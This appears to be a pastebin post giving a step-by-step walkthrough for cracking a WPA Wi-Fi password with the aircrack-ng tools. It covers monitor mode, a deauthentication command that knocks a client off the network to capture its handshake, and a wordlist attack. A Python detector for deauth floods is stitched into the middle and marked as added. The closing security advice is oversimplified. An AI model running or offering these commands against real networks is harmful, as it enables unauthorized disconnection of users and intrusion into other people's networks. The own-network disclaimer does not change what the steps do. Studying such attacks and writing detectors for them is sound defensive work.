Untitled

a guest
Dec 9th, 2018
My basic steps are:

1) airmon-ng start wlan0
2) iwconfig
3) airodump-ng mon0
4) Hit Ctrl+C on my keyboard
5) airodump-ng -c 6 -w output --bssid 00:11:22:33:44:55 mon0   (then open another terminal)
6) aireplay-ng -0 1 -a 00:11:22:33:44:55 -c 00:22:44:66:88:10 mon0
7) aircrack-ng -w /home/youruser/wordlist.txt -b 00:11:22:33:44:55 output*.cap

Descriptions:

1) This puts my card into monitor mode. My particular driver creates another interface called mon0, so I have to use this from now on.
2) Just to check that wlan0 is in managed mode and mon0 is in monitor mode.
3) Starts airodump to view networks. It provides the necessary info: channel number, MAC address, ESSID, etc.
4) This stops airodump so we can restart it with the info we need.
5) Starts airodump for the network we're interested in. The data column should increase for this to work.
6) This step isn't necessary if you're on a fairly active network with people connecting frequently, because for WPA you need to capture someone logging into the network. This command sends a deauthentication request to a connected client so it is forced to reconnect, letting you sniff out the handshake. "-0 1" is the number of deauth requests; increase the 1 if you need more. -c is a client on the network, which you can find at the bottom of the previous terminal from step 5.
7) Starts aircrack using the wordlist you have. You must put the full path to the list unless you are in the same directory; you can find wordlists anywhere. This runs the wordlist against the data you've collected in the "output" file.
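As an added, defender-side example that is not part of the original paste: the deauthentication burst from step 6 is visible on the air, so a monitor-mode capture can be checked for it. The script below parses raw 802.11 management headers, counts deauth frames per (BSSID, target) pair and flags bursts above a threshold; the frames it runs on are constructed inline using the AP and client addresses from the steps above, and the threshold of 5 is an assumed tuning value.

```python
import struct
from collections import Counter

TYPE_MGMT = 0         # 802.11 frame control: type in bits 2-3, subtype in bits 4-7
SUBTYPE_BEACON = 0x08
SUBTYPE_DEAUTH = 0x0C

def _mac(frame, off):
    return ":".join(f"{b:02x}" for b in frame[off:off + 6])

def parse_frame(frame):
    """Return (type, subtype, addr1, addr2, addr3) from a raw 802.11 MAC header, or None if too short."""
    if len(frame) < 24:
        return None
    fc = struct.unpack_from("<H", frame, 0)[0]
    return (fc >> 2) & 0x3, (fc >> 4) & 0xF, _mac(frame, 4), _mac(frame, 10), _mac(frame, 16)

def detect_deauth_flood(frames, threshold=5):
    """Count deauth frames per (bssid, target) and return the pairs at or above threshold."""
    counts = Counter()
    for frame in frames:
        parsed = parse_frame(frame)
        if parsed and parsed[0] == TYPE_MGMT and parsed[1] == SUBTYPE_DEAUTH:
            counts[(parsed[4], parsed[2])] += 1  # key on (bssid, destination)
    return {pair: n for pair, n in counts.items() if n >= threshold}

def build_frame(subtype, dst, src, bssid):
    """Build a minimal 802.11 management frame; used here only to construct sample input."""
    hdr = struct.pack("<H", (TYPE_MGMT << 2) | (subtype << 4)) + b"\x00\x00"  # frame control, duration
    for addr in (dst, src, bssid):
        hdr += bytes.fromhex(addr.replace(":", ""))
    hdr += b"\x00\x00"  # sequence control
    if subtype == SUBTYPE_DEAUTH:
        hdr += struct.pack("<H", 7)  # reason code 7: class 3 frame received from non-associated STA
    return hdr

# Constructed sample capture using the AP and client addresses from the steps above.
AP = "00:11:22:33:44:55"
CLIENT = "00:22:44:66:88:10"
SAMPLE_FRAMES = (
    [build_frame(SUBTYPE_BEACON, "ff:ff:ff:ff:ff:ff", AP, AP)] * 3  # normal beacons
    + [build_frame(SUBTYPE_DEAUTH, CLIENT, AP, AP)] * 8            # burst of deauths aimed at one client
    + [build_frame(SUBTYPE_DEAUTH, AP, CLIENT, AP)]                # one stray deauth, below threshold
)

if __name__ == "__main__":
    for (bssid, target), n in detect_deauth_flood(SAMPLE_FRAMES).items():
        print(f"possible deauth flood: bssid={bssid} target={target} deauth frames={n}")
```

On a real capture the same function can be fed the 802.11 payloads of each packet in turn; an idle client that is deauthenticated repeatedly in a short window is the pattern to alert on.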
  22.  
NOTE: you have to have your card on the same channel as the access point, so you have to make sure your card is not channel hopping. The channel listed in the terminal in step #5 for the AP is the channel your card must be on. You can check this by running iwconfig; where it says frequency, that's the channel you're on. Here's the channel to frequency conversion:
  24.  
CH  FREQ (GHz)
01  2.412
02  2.417
03  2.422
04  2.427
05  2.432
06  2.437
07  2.442
08  2.447
09  2.452
10  2.457
11  2.462
  37.  
This particular crack tried 49,422 different keys before it was successful. It did this at a rate of 493.81 keys per second, so it took 99.72 seconds to actually crack this network, which is pretty quick considering it did 50,000 words in under 100 seconds.
  39.  
  40.  
DISCLAIMER: Do not do this on someone else's network that you do not have permission for. This is purely for security testing your network to see how vulnerable it is to certain attacks.
  42.  
If you use a strong WPA password your network should be pretty secure. WPA is only crackable by using wordlists, so if you use a tough password that isn't on any wordlist your network is secure. Never use WEP because it's even easier to crack than an easy WPA network.